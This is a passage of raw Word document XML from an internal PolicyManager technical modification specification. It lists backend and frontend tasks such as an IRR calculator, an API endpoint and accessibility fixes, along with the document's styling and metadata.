                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Section Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Implement IrrCalculatorService with Newton-Raphson XIRR</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add GET /api/policies/{id}/irr endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§4.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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8.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Display IRR with benchmark comparison on policy detail</w:t>
            </w:r>
          </w:p>
        </w:tc>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§4.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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8.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add aria-label to all icon-only buttons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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8.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add aria-invalid + aria-describedby to all form fields</w:t>
            </w:r>
          </w:p>
        </w:tc>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§8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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8.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Create FocusTrapDirective and apply to all modals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§8.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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8.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add skip-to-content link in app.component.html</w:t>
            </w:r>
          </w:p>
        </w:tc>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§8.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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WCAG contrast audit — fix text-muted on all surfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§8.x Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="156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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Add MediatR CQRS for CreatePolicy and MarkAsPaid</w:t>
            </w:r>
          </w:p>
        </w:tc>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§5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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8.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="42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Add 5-year forecast projection to InvestmentForecastService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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§2.7 Enh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="140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Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="E2E8F0" w:sz="4"/>
              <w:left w:val="single" w:color="E2E8F0" w:sz="4"/>
              <w:bottom w:val="single" w:color="E2E8F0" w:sz="4"/>
              <w:right w:val="single" w:color="E2E8F0" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F8F7FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E2E8F0" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">End of Technical Modification Specification v3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">All modifications are cross-referenced to the PolicyManager Enhancement Review v2.0</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pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">© PolicyManager Engineering Team  |  For Internal Use Only  |  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">PolicyManager — Technical Modification Specification v3.0</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="4F46E5"/>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1B4B"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="140" w:before="320"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F46E5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:before="240"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="475569"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="180"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="3730A3"/>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PolicyManager — Technical Modification Specification v3.0</dc:title>
  <dc:creator>PolicyManager Engineering</dc:creator>
  <dc:description>Detailed implementation guide for all modifications identified in the Enhancement Review</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-16T18:34:43.850Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-16T18:34:43.850Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>